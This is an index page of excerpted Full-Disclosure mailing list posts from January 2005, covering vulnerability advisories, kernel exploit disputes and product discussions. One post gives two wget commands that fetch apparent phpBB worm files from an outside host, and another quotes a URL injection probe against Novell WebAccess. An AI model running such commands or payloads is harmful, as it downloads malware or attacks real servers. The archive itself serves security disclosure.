[Full-Disclosure] Microsoft AntiSpyware - First Impressions

We knew that Microsoft was going to put out an anti-spyware product after they bought Giant in December, but I did not figure they could re-brand Giant’s software in under a month.  Their first shot at anti-spyware came out today – Microsoft AntiSpyware (Beta).  I installed it on a test m

RE: [Full-Disclosure] hackers hacking hackers wtf?

Perhaps the 'hacker hackers' should learn correct grammar and spelling before attempting to ridicule others... -Original Message- Subject: RE: [Full-Disclosure] hackers hacking hackers wtf? The website is down But you can still see the hacked page at Google cache... http://www.goog

RE: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

>Subject: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB These attacks have been possible in almost all kinds of compresses file formats and have been known for years - I think it is know as zip bombing This is not limited to this perticular tool or format. __

RE: [Full-Disclosure] Trivial Bug in Symantec Security Products

-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gregh Sent: Tuesday, January 04, 2005 6:33 AM To: Disclosure Full Subject: Re: [Full-Disclosure] Trivial Bug in Symantec Security Products > > Somehow, Symantec engineers have not implemented a mechanis

Re: [Full-Disclosure] Any study on patch availability?

http://secunia.com/advisory_statistics/ ever heard of google? On Sun, 26 Dec 2004 12:26:17 -0500 (EST), [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > Hi all, > > Holiday season greetings. > > I am a PhD student at Princeton studying security. I am interested in > studying vulnerability sta

RE: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

Title: Message Yeah I tried it too, and the only thing it found on my PC was VNC server. I was, however, impressed that the tool explained very well what the program was for and how it could be used for spying.   Definitely worth a try.   PS: VNC on my machine is not accessible from outside

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

On Thu, 6 Jan 2005, James Patterson Wicks wrote: > While this was just a quick test to satisfy my curiosity about the > Microsoft tool, my initial feeling is that the Microsoft AntiSpyware is > worth a test deployment in the office. This beta expires in July. > Hopefully the final version will be

[Full-Disclosure] Advisory 1/2005 - Linux Kernel arbitrary code execution vulnerability.

/* A New Initiative for a New Year * * E-matters are pleased to announce their new Microsoft-approved * Responsible Disclosure initiative in which we will be working * very closely with eEye, iDefense and the vendersec mailing list: * "e-eyeDefenderSec - Because the 'e'-matters" *

[Full-Disclosure] [USN-56-1] exim4 vulnerabilities

=== Ubuntu Security Notice USN-56-1January 07, 2005 exim4 vulnerabilities CAN-2005-0021, CAN-2005-0022 === A security issue affects the following Ubuntu releases: Ubuntu 4.1

[Full-Disclosure] Simple PHP Blog directory traversal vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: Simple PHP Blog directory traversal vulnerability Vulnerability discovery: Madelman Date: 02/01/2005 Severity: Moderate Summary: - I started this project because I wanted a dead-simple blog. Something that didn't require a database, use

[Full-Disclosure] Linux kernel sys_uselib local root vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi all, first of all I must comply about the handling of this vulnerability that I reported to vendorsec. Obviously my code posted there has been stolen and plagiated by Stefan Esser from Ematters. The posting containing the plagiate will follow. Now

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

Do a software update check with this thing and you get GIANTAntiSpywareMain.exe listening on port 2571 until the software is closed. Feel free to beat on and fuzz that port fellas. =] -KF KF (lists) wrote: I love how the icon for this product is a big Target. Very appropreate. Anyone wanna tak

Re: [Full-Disclosure] This sums up Yahoo!s securitypolicyto a -T-

Greetings fellow mortals, All of you need a break. Clearly, nobody's able to recognise satire nor parody anymore. First the rm vulnerability discussion, now this... On Tuesday 04 January 2005 15:48, Clairmont, Jan M wrote: > I love it when self-proclaimed luzer's claim to own anything. What d

[Full-Disclosure] [iSEC] [Dailydave] Advisory 1/2005 - Linux Kernel arbitrary code execution (fwd)

here the plagiate. -- Paul Starzetz iSEC Security Research http://isec.pl/ -- Forwarded message -- Date: Fri, 7 Jan 2005 09:39:18 +0100 (CET) From: Janusz Niewiadomski <[EMAIL PROTECTED]> Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [iSEC] [Dailydave] Advisory 1/2

[Full-Disclosure] Undocumented sun classes

Hi list; Sun's website states that the sun.* packages are not part of the supported, public interface... (http://java.sun.com/products/jdk/faq/faq-sun-packages.html)... However, i'm looking for security related information about those "undocumented" sun.* classes. Does anyone have an idea ? Th

[Full-Disclosure] ndisasm bad opcodes interpretation

Hi, not a vulnerability but could be a headache while reverse ingineering or binary auditing/interpreting, etc. (ok anything related with disassembling) get wrong values. [EMAIL PROTECTED]:/tmp$ ndisasm -b32 salida 49 dec ecx 0001 6E outsb 0002 7465 jz 0x69 0004 6C insb 0

[Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

Hi all, first of all I must comply about the handling of this vulnerability that I reported to vendorsec. Obviously my code posted there has been stolen and plagiated in order to put the blame on Stefan Esser from Ematters and disturb the security community. I really apologize to Stefan Esser

[Full-Disclosure] Novell WebAcces

  I was playing around when I found a small problem with Novell's WebAcces.With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried "> so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang="> a Link apeared I click

Re: [Full-Disclosure] Possible DNS compromise/poisoning?

[EMAIL PROTECTED]([EMAIL PROTECTED])@Wed, Jan 05, 2005 at 06:45:08AM -0800: > > Notice that www.microsoft.com is a cname for > www.microsoft.com.nsatc.net. It's not limited to www.microsoft.com > and to the best of my knowledge the correct web content is > displayed. Microsoft used to have their

Re: [Full-Disclosure] Yahoo security and privacy

On Tue, 04 Jan 2005 14:18:49 +0200, Alex V. Lukyanenko <[EMAIL PROTECTED]> wrote: > > Quoting n3td3v, > > Because we all know Yahoo! has no account security, so kids aged 15 > > can hack an account. Yahoo! is like hacking for beginners. Its easy to > > do, and therefore a great network to learn sk

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

I love how the icon for this product is a big Target. Very appropreate. Anyone wanna takes bets on how long it takes for someone to find a hole in the Spynet p2p functions of this beast, what port is that listening on again? *grin* -KF James Patterson Wicks wrote: We knew that Microsoft was goi

Re: [Full-Disclosure] Novell WebAcces

Hi, > It seems that this is working on almost every webacces server Just did a quick google and tried that on a couple of sites but no link appeared. Does this require authentication?? Cheers, DanB UK. DanB UK London, UK. ___ Full-Disclosure - We beli

[Full-Disclosure] Press Release Survivor Location Assistance Project

FOR IMMEDIATE RELEASE CONTACT: North America: B.K. DeLong Media Liaison The Hacker Foundation telephone: +1.617.797.2472 Christian Wright Media Liaison Packetstorm Security telephone: +1.312.399.5064 Europe: Emerson Tan Director Packetstorm Security telephone: +44.781.456.8265 e-mail: [EMAIL PROTEC

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

On Fri, 7 Jan 2005 17:57:55 +0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > Yeah I tried it too, and the only thing it found on my PC was VNC server. I > was, however, impressed that the tool explained very well what the program > was for and how it could be used for spying. It picked u

[Full-Disclosure] [grsec] grsecurity 2.1.0 release / 5 Linux kernel advisories

grsecurity 2.1.0 release / Linux Kernel advisories Table Of Contents: 1) grsecurity 2.1.0 announcement and changelog 2) Linux Kernel advisory introduction 3) 2.4/2.6 random poolsize sysctl handler integer overflow 4) 2.6 scsi ioc

[Full-Disclosure] grsecurity 2.1.0 release / 5 Linux kernel advisories

Let's try this again, since web archives don't like multipart attachments. grsecurity 2.1.0 release / Linux Kernel advisories Table Of Contents: 1) grsecurity 2.1.0 announcement and changelog 2) Linux Kernel advisory introducti

RE: [Full-Disclosure] Novell WebAcces

I think maybe you’re seeing the directory traversal vulnerability identified in Groupwise.  Groupwise 6 had this vulnerability as well as previous versions if I remember right. http://xforce.iss.net/xforce/xfdb/7287   Thanks, Michael Horseman IT Security Analyst Capgemini [EMAIL PR

[Full-Disclosure] Re: ndisasm bad opcodes interpretation

"shadown" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED] > > i.e: > 001C 7565 jnz 0x83 > sould had been jnz 0x65 No it shouldn't. Engage brain before opening mouth: what is 0x65 + 0x1e (== address of byte immediately after the instruction in question)? Google "pc-relative br

[Full-Disclosure] Re: grsecurity 2.1.0 release / 5 Linux kernel advisories

looks good. On Fri, 7 Jan 2005, Brad Spengler wrote: > Let's try this again, since web archives don't like multipart > attachments. > > grsecurity 2.1.0 release / Linux Kernel advisories > > > Table Of Contents: > 1) grsecurity

Re: [Full-Disclosure] RE: Full-Disclosure Digest, Vol 1, Issue 2144

Try here instead: - http://lists.netsys.com/mailman/listinfo/full-disclosure Goes for anyone who wishes to be removed. ;) Save this email for suture reference. On Thu, 30 Dec 2004 15:34:13 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > Please unsubscribe me from this list > [BIG SNIP] _

[Full-Disclosure] Re: ndisasm bad opcodes interpretation

my mistake... short jump: it's JMP_Address + 2 + Second_Byte_value = Next_Instruction_Address [EMAIL PROTECTED]:~/tmp$ echo -n -e "\x75\x65" > a [EMAIL PROTECTED]:~/tmp$ ndisasm -b32 a 7565 jnz 0x67 [EMAIL PROTECTED]:~/tmp$ ~/instalar/libdisassemble/disassemble.py a 0x0 0xf

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

On Fri, 07 Jan 2005 12:52:58 CST, Kyle Maxwell said: > It may not be perfect (I thought the Spyware Community was essentially > sending back to a central site, didn't realize it was P2P, this > requires a closer look) but at a minimum it's nice to see MS giving > this some attention. Fix the IE ho

[Full-Disclosure] One more phpBB worm

wget -vv atlasol.com/.zk/sess_189f0f0889555397a4de5485dd61 wget -vv atlasol.com/.zk/sess_189f0f0889555397a4de5485dd62 all the best, W ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] RE: Full-Disclosure Digest, Vol 1, Issue 2144

On Fri, 07 Jan 2005 13:07:52 PST, GuidoZ said: > Try here instead: > - http://lists.netsys.com/mailman/listinfo/full-disclosure > > Goes for anyone who wishes to be removed. ;) Save this email for > suture reference. Or look at the e-mail headers for *every message*: List-post:

[Full-Disclosure] iDEFENSE Security Advisory [IDEF0731] Exim auth_spa_server() Buffer Overflow Vulnerability

Exim auth_spa_server() Buffer Overflow Vulnerability iDEFENSE Security Advisory [IDEF0731] www.idefense.com/application/poi/display?id=178&type=vulnerabilities January 07, 2004 I. BACKGROUND Exim is a message transfer agent developed for use on Unix systems. More information is available at:

[Full-Disclosure] iDEFENSE Security Advisory [IDEF0725] Exim host_aton() Buffer Overflow Vulnerability

Exim host_aton() Buffer Overflow Vulnerability iDEFENSE Security Advisory [IDEF0725] http://www.idefense.com/application/poi/display?type=vulnerabilities January 07, 2005 I. BACKGROUND Exim is a message transfer agent developed for use on Unix systems. More information is available at:

[Full-Disclosure] Kindergarten on vacation (was: Obvious fake mail...)

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi again, it is quite funny how Immunitysec is supporting the kids that first stole Paul's linux local root exploit and then sent it out to the whole world in my name. Otherwise it is hard to explain why dailydave again and again lets those obviously

[Full-Disclosure] Firefox long URL field obfuscation vulnerability?

This is a quick heads up for people who want to investigate it further. At least on my Ubuntu system (warty), a URL with a significant amount of data seems to "obfuscate" the URL field and not allow the end user to properly identify the site to which they are connecting. This could be another pote

[Full-Disclosure] Outsch... Sorry...

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Outsch! My mail was so fast through that I do not believe anymore that it is moderated at the moment :) So sorry to Dave. Stays the question why pipermail is too dumb to generate correct archives ;) Stefan -BEGIN PGP SIGNATURE- Version: GnuP

Backdoors and source code (was Re: [Full-Disclosure] Multiple Backdoors found...)

On Sun, 02 Jan 2005 20:27:09 -0800, Blue Boar <[EMAIL PROTECTED]> wrote: > Dave Aitel wrote: > > Of course, this sort of thing is basically impossible to disprove - > > especially without source. > > If I were looking for a well-hidden backdoor, I wouldn't bother with > source. There's no guarant